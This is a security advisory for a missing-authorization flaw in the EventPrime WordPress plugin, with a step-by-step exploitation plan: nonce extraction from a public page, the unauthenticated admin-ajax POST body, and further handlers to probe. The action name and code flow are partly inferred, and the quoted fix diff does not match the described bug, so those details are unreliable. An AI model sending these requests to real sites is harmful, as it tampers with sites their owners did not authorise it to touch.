EventPrime – Events Calendar, Bookings and Tickets <= 4.2.8.3 - Missing Authorization
Description
The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 4.2.8.3. This makes it possible for unauthenticated attackers to perform an unauthorized action.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:NTechnical Details
<=4.2.8.3What Changed in the Fix
Changes introduced in v4.2.8.4
Source Code
WordPress.org SVN# Exploitation Research Plan: CVE-2026-25312 (Missing Authorization in EventPrime) ## 1. Vulnerability Summary The **EventPrime – Events Calendar, Bookings and Tickets** plugin (up to version 4.2.8.3) contains a missing authorization vulnerability. An unauthenticated attacker can perform unauthoriz…
Show full research plan
Exploitation Research Plan: CVE-2026-25312 (Missing Authorization in EventPrime)
1. Vulnerability Summary
The EventPrime – Events Calendar, Bookings and Tickets plugin (up to version 4.2.8.3) contains a missing authorization vulnerability. An unauthenticated attacker can perform unauthorized actions—specifically state-changing operations such as dismissing administrative notices—due to the plugin registering an AJAX handler via wp_ajax_nopriv_ without implementing a current_user_can() check.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Action:
ep_dismiss_admin_notice(Inferred from nonce naming) - Vulnerable Parameter:
notice_id - Authentication: None (Exploitable via
wp_ajax_nopriv_) - Preconditions: The attacker must obtain a valid nonce, which is localized and leaked on pages where the plugin's admin utilities are enqueued.
3. Code Flow
- In
admin/class-eventprime-event-calendar-management-admin.php, the methodenqueue_scripts()creates a nonce with the action string'ep_dismissable_notice_nonce'. - This nonce is localized to the JavaScript variable
ep_ajax_objectunder the keynonce. - The plugin registers an AJAX handler (likely
ep_dismiss_admin_notice) usingadd_action('wp_ajax_nopriv_ep_dismiss_admin_notice', ...)andadd_action('wp_ajax_ep_dismiss_admin_notice', ...). - The handler function verifies the nonce using
check_ajax_referer('ep_dismissable_notice_nonce', 'nonce')orwp_verify_nonce(). - Crucially, the handler fails to check if the requester has administrative privileges (e.g.,
manage_options). - An unauthenticated user can provide a valid nonce and a
notice_idto modify the site state by dismissing persistent admin notices for all users.
4. Nonce Acquisition Strategy
The nonce is localized in the ep_ajax_object object. While enqueued in the admin class, EventPrime often loads these utilities on the frontend or login pages if certain blocks/shortcodes are present.
- Identify Trigger: The plugin's scripts are typically enqueued when a calendar or event list is rendered.
- Create Setup Page:
wp post create --post_type=page --post_title="Calendar Test" --post_status=publish --post_content='[em_calendar]' - Navigate and Extract:
- Navigate to the newly created page.
- Use
browser_evalto extract the nonce:window.ep_ajax_object?.nonce
5. Exploitation Strategy
Once the nonce is obtained, perform an unauthenticated POST request to trigger the unauthorized action.
- URL:
http://[target]/wp-admin/admin-ajax.php - Method:
POST - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
(Note: common notice IDs includeaction=ep_dismiss_admin_notice&nonce=[EXTRACTED_NONCE]¬ice_id=ep_rating_noticeep_rating_notice,ep_welcome_notice, orep_trial_notice).
6. Test Data Setup
- Install EventPrime version 4.2.8.3.
- Ensure at least one admin notice is "visible" (default on fresh install).
- Create a public page with the
[em_calendar]shortcode to facilitate nonce leakage.
7. Expected Results
- HTTP Response: The server should return a successful status code (usually
200 OK) and a body containing1or{"success":true}. - State Change: The targeted notice will be marked as dismissed in the database (typically in the
wp_optionstable), preventing administrators from seeing it.
8. Verification Steps
After the HTTP request, verify the state change using WP-CLI:
# Check the dismissed notices option (name inferred based on plugin patterns)
wp option get ep_dismissed_notices
Alternatively, log in as an administrator and check if the notice (e.g., the rating or welcome notice) has disappeared from the dashboard.
9. Alternative Approaches
If ep_dismiss_admin_notice is not the specific action, investigate other handlers registered in class-eventprime-event-calendar-management-admin.php that use the ep_ajax_object nonce. Possible candidates include:
ep_fb_load_more_bookings(ifnoprivregistration exists, check for PII leakage).ep_save_event_order(unauthorized modification of event display order).- Check if the nonce action passed to
wp_verify_nonceis-1(the default), which would allow any valid nonce from the system to be used.
Summary
The EventPrime plugin fails to implement proper authorization checks on its AJAX handlers, specifically the action responsible for dismissing administrative notices. Unauthenticated attackers can obtain a leaked nonce from the site's frontend and use it to dismiss important dashboard notices for all administrators.
Vulnerable Code
// admin/class-eventprime-event-calendar-management-admin.php @ line 105 wp_enqueue_script( $this->plugin_name, plugin_dir_url( __FILE__ ) . 'js/eventprime-event-calendar-management-admin.js', array( 'jquery' ), $this->version, true ); $ep_dismissable_notice_nonce = wp_create_nonce( 'ep_dismissable_notice_nonce' ); wp_localize_script( $this->plugin_name, 'ep_ajax_object', array( 'nonce' => $ep_dismissable_notice_nonce, 'ajax_url' => admin_url( 'admin-ajax.php' ), ) );
Security Fix
@@ -1184,6 +1184,9 @@ 'normal', 'low' ); + + do_action('ep_register_metabox_before_ticket_attendees'); + add_meta_box( 'ep_tickets_attendies', esc_html__( 'Tickets Attendees', 'eventprime-event-calendar-management' ), ... (truncated)
Exploit Outline
The exploit targets the `ep_dismiss_admin_notice` AJAX action (inferred from the `ep_dismissable_notice_nonce` localized script). 1. Nonce Acquisition: An unauthenticated attacker visits any public page where EventPrime enqueues its scripts (such as a page with the `[em_calendar]` shortcode). They extract the nonce from the global JavaScript object `ep_ajax_object.nonce`. 2. Payload Construction: The attacker prepares a POST request to `/wp-admin/admin-ajax.php`. 3. Request Shape: The body must include `action=ep_dismiss_admin_notice`, the extracted `nonce`, and the `notice_id` of the admin notice they wish to dismiss (e.g., `ep_rating_notice`). 4. Execution: Because the plugin registers the handler using `wp_ajax_nopriv_` and fails to call `current_user_can('manage_options')` within the handler function, the request succeeds. 5. Result: The targeted administrative notice is marked as dismissed in the site's database, hiding it from legitimate administrators.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.